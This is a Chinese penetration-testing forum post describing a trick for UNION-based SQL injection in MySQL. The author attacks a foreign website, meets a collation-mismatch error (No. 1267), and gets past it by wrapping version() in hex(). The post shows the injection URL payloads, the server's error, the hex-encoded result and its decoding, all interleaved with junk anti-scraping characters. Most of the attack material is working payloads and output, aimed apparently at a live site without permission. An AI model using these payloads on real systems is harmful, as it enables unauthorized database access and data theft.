找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 MySQL注射时ErrorNo.1267的突破
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2220|回复: 0
打印 上一主题 下一主题

MySQL注射时ErrorNo.1267的突破

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:04:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文作者:SuperHei2 |# g8 @) X1 h
文章性质:原创6 [# g; B6 w' E- s" O) p
发布日期:2005-10-189 F. U  j0 e4 B! Z7 r9 ^+ l
测试个国外的站时:8 d1 X, {# i2 X3 L# A! ~; C% f
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*0 Q( x  R, p) _
返回错误:: a. r: f9 E1 _# |
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
/ P/ y8 q0 s7 |4 T2 [2 E) bMySQL Error No. 126
7 T" R& c9 z  k1 {7 n" F3 \- ~看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。2 y- f; W0 m! _( N+ t: A
解决办法:转为其他编码如hex。
8 ?( _6 J2 e9 Vurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
7 q1 U# }9 D* X" \成功得到hex(version())的值为:
1 U: D' ~! |/ }) Q% v2 t342E312E332D62657461$ E  n& s4 s( i
回Mysql查询下得到:
/ B) p% @4 L4 T* r5 k; Y6 [mysql> select 0x342E312E332D62657461;
3 }7 {. I" R2 s9 c( F4 `+------------------------+$ ]& ?8 B3 q* x
| 0x342E312E332D62657461 |
- i) V& V' ^7 s. ?: v$ u+------------------------+- \! L/ I( m/ k  O. s) i
| 4.1.3-beta |" [. [# j! v2 [8 p
+------------------------+
1 y4 i' R2 g8 Y, {- K1 row in set (0.00 sec)+ H( x5 U9 ?$ {" p3 v5 }: S

' [- \8 M5 _1 T% I/ t$ N
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表